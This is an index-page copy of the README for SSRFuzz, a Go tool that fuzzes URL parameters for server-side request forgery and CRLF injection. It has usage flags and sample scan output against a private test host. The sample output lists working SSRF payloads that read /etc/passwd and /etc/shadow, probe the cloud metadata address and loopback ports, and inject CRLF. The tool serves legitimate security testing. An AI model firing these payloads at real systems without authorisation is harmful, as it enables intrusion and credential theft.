Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/ryandamour/ssrfuzz
SSRFuzz is a tool to find Server Side Request Forgery vulnerabilities, with CRLF chaining capabilities
https://github.com/ryandamour/ssrfuzz
bugbounty security ssrf
Last synced: 22 days ago
JSON representation
SSRFuzz is a tool to find Server Side Request Forgery vulnerabilities, with CRLF chaining capabilities
- Host: GitHub
- URL: https://github.com/ryandamour/ssrfuzz
- Owner: ryandamour
- Created: 2021-01-12T23:26:41.000Z (almost 4 years ago)
- Default Branch: master
- Last Pushed: 2021-03-02T08:14:49.000Z (almost 4 years ago)
- Last Synced: 2024-08-05T17:31:34.516Z (4 months ago)
- Topics: bugbounty, security, ssrf
- Language: Go
- Homepage:
- Size: 50.8 KB
- Stars: 184
- Watchers: 6
- Forks: 22
- Open Issues: 3
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
- awesome-hacking-lists - ryandamour/ssrfuzz - SSRFuzz is a tool to find Server Side Request Forgery vulnerabilities, with CRLF chaining capabilities (Go)
README
# SSRFUZZ
SSRFuzz is a tool to find Server Side Request Forgery vulnerabilities, with CRLF chaining capabilities
## Why?
- I wanted to write a tool in Golang for concurrency
- I wanted to fuzz parameters for SSRF vulnerablities, as well as fuzz _both_ paths and parameters for CRLF injections
- I was inspired by Orange's work for chaining these types of vulnerabilities together (https://blog.orange.tw)## Installation
Run the following command to intsall
```bash
go get -u github.com/ryandamour/ssrfuzz
```## Usage
```go
██████ ██████ ██▀███ █████▒█ ██ ▒███████▒▒███████▒
▒██ ▒ ▒██ ▒ ▓██ ▒ ██▒▓██ ▒ ██ ▓██▒▒ ▒ ▒ ▄▀░▒ ▒ ▒ ▄▀░
░ ▓██▄ ░ ▓██▄ ▓██ ░▄█ ▒▒████ ░▓██ ▒██░░ ▒ ▄▀▒░ ░ ▒ ▄▀▒░
▒ ██▒ ▒ ██▒▒██▀▀█▄ ░▓█▒ ░▓▓█ ░██░ ▄▀▒ ░ ▄▀▒ ░
▒██████▒▒▒██████▒▒░██▓ ▒██▒░▒█░ ▒▒█████▓ ▒███████▒▒███████▒
▒ ▒▓▒ ▒ ░▒ ▒▓▒ ▒ ░░ ▒▓ ░▒▓░ ▒ ░ ░▒▓▒ ▒ ▒ ░▒▒ ▓░▒░▒░▒▒ ▓░▒░▒
░ ░▒ ░ ░░ ░▒ ░ ░ ░▒ ░ ▒░ ░ ░░▒░ ░ ░ ░░▒ ▒ ░ ▒░░▒ ▒ ░ ▒
░ ░ ░ ░ ░ ░ ░░ ░ ░ ░ ░░░ ░ ░ ░ ░ ░ ░ ░░ ░ ░ ░ ░
░ ░ ░ ░ ░ ░ ░ ░
░ ░===============================================================
SSRFUZZ 1.2
by Ryan D'Amour @ryandamour
===============================================================A scanner for all your SSRF Fuzzing needsUsage:
ssrfuzz scan [flags]Flags:
-b, --call-back string Add callback for SSRF fuzzing (ie: https://github.com/ropnop/serverless_toolkit/tree/master/ssrf_slack)
-c, --cookie string Cookie to use for requests
--crlf-path Add CRLF payloads to all available paths (ie: site.com/%0Atest.php)
--delay int The time each threads waits between requests in milliseconds (default 100)
-d, --domains string Location of domains with parameters to scan
-h, --help help for scan
-x, --http-method string HTTP Method - GET or POST (default "GET")
-o, --output string Location to save results
--skip-crlf Skip CRLF fuzzing
--skip-network Skip network fuzzing
--skip-scheme Skip scheme fuzzing
-s, --slack-webhook string Slack webhook to send findings to a channel
-t, --threads int Number of threads to run ssrfuzz on (default 50)
--timeout int The amount of time needed to close a connection that could be hung (default 10)
-u, --user-agent string User agent for requests (default "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36")
-v, --verbose verbose output
``````bash
Usage:
echo "http://url_to_fuzz" | ssrfuzz scan
cat file_of_domains.txt | ssrfuzz scan
ssrfuzz scan -d file_of_domains.txt
``````go
* Scanning http and scheme payloads w/ crlf:echo "http://192.168.1.10/test.php?u=" | go run main.go scan
[!] Scheme payload match:
* http://192.168.1.10/test.php?u=file://etc/passwd 200[!] Interesting payloads found
* http://192.168.1.10/test.php?u=http://127.1.0.0:80 200
* http://192.168.1.10/test.php?u=http://127.1.0.0:8080 500
* http://192.168.1.10/test.php?u=http://127.1.0.0:443 500
* http://192.168.1.10test.php?u=http://127.1.0.0:22 500
* http://192.168.1.10/test.ph?u=http://127.1.0.0:25 500
* http://192.168.1.10/test.php?u=http://127.1.0.0:445 500[!] Interesting payloads found
* http://192.168.1.10/test.php?u=http://127.127.127.127:80%23%OA 200
* http://192.168.1.10/test.php?u=http://127.127.127.127:80%23%OA 200
* http://192.168.1.10/test.php?u=http://127.127.127.127:8080%23%OA 500
* http://192.168.1.10/test.php?u=http://127.127.127.127:8080%23%OA 500
``````go
* Scanning only http payloads w/ crlf:echo "http://192.168.1.10/test.php?u=" | go run main.go scan --skip-scheme
[!] Interesting payloads found
* http://192.168.1.10/test.php?u=http://127.127.127.127:80%23%OA 200
* http://192.168.1.10/test.php?u=http://127.127.127.127:80%23%OA 200
* http://192.168.1.10/test.php?u=http://127.127.127.127:8080%23%OA 500
* http://192.168.1.10/test.php?u=http://127.127.127.127:8080%23%OA 500
* http://192.168.1.10/test.php?u=http://127.127.127.127:443%23%OA 500
* http://192.168.1.10/test.php?u=http://127.127.127.127:443%23%OA 500
* http://192.168.1.10/test.php?u=http://127.127.127.127:25%23%OA 500
* http://192.168.1.10/test.php?u=http://127.127.127.127:25%23%OA 500
* http://192.168.1.10/test.php?u=http://127.127.127.127:22%23%OA 500
* http://192.168.1.10/test.php?u=http://127.127.127.127:22%23%OA 500
* http://192.168.1.10/test.php?u=http://127.127.127.127:445%23%OA 500
* http://192.168.1.10/test.php?u=http://127.127.127.127:445%23%OA 500
``````go
* Scanning only http payloads w/o crlf:echo "http://192.168.1.10/test.php?u=" | go run main.go scan --skip-scheme --skip-crlf
[!] Interesting payloads found
* http://192.168.1.10/test.php?u=http://127.1.0.0:80 200
* http://192.168.1.10/test.php?u=http://127.1.0.0:8080 500
* http://192.168.1.10/test.php?u=http://127.1.0.0:443 500
* http://192.168.1.10/test.php?u=http://127.1.0.0:22 500
* http://192.168.1.10/test.php?u=http://127.1.0.0:25 500
* http://192.168.1.10/test.php?u=http://127.1.0.0:445 500
``````go
* Scanning only scheme payloads w/o crlf:echo "http://192.168.1.10/test.php?u=" | go run main.go scan --skip-network --skip-crlf
[!] Interesting payloads found
* http://192.168.1.10/test.php?u=file:///etc/passwd 200
* http://192.168.1.10/test.php?u=file:///etc/shadow 500
* http://192.168.1.10/test.php?u=file://169.254.169.254/ 500
```## Contributing
Pull requests are welcome. For major changes, please open an issue first to discuss what you would like to change.Please make sure to update tests as appropriate.
## License
[MIT](https://choosealicense.com/licenses/mit/)## Sponsored By
[Stage2Security](https://www.stage2sec.com)
![alt text](https://miro.medium.com/max/168/1*Pzr_iwx12ycGpGg0K0Yauw.png)